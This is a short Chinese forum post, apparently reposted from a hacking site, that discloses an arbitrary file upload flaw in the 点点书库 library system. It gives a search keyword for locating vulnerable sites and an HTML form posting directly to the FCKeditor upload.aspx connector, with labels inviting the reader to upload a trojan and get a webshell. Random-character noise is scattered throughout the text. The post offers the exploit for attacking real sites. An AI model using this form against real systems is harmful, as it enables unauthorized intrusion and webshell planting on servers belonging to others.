主题:图书馆系统任意文件上传漏洞
. ^8 ?$ P. y9 q7 q: s e) |7 y 作者:冰锋刺客4 g/ j" E* U, P8 l! _( |
厂商:点击书(dianjishu.com)
@2 E- o! r& C 日期:2012-6-217 n: u; D. w$ ^* `+ g
9 u1 g" u0 B4 F* aI 概述
% A$ u: f3 V% {# s 点点书库图书馆系统存在文件上传漏洞,导致可以直接拿webshell @8 Q& u" n3 n2 m- C7 O
II 简介& p) x0 @& U3 m3 c8 d# s* ^- x
关键词:"Copyright (C) 点点电子书库 2009-2010, All Rights Reserved"4 T4 H3 u' L5 I, t
补充一个漏洞
) G3 u1 `. Y+ x$ U. f* } <form id="frmUpload" enctype="multipart/form-data"
. p1 H9 n8 q$ V0 g9 T action="http://url/admin/js/fckeditor/editor/filemanager/connectors/aspx/upload.aspx?Type=Media" method="post">请上传您的马子<br><input type="file" name="NewFile" size="50"><br>( w1 I5 r( f% E! N9 f
<input id="btnUpload" type="submit" value="操翻他">8 K: ^% B" n% x# C
</form>
5 ?0 [; s# S s- P4 \* P, T1 z/ U 你们懂的$ f0 U% K: o" z1 y
那傻逼提供还需要改包.6 Z% m+ n" O: C" y' h
自己看了下源代码发现fckeditor
/ _# x. e3 u" N 直接秒杀
2 @! {( q# j6 x l$ _. J# J |
发表于 2012-9-10 21:20:59
收藏
支持
反对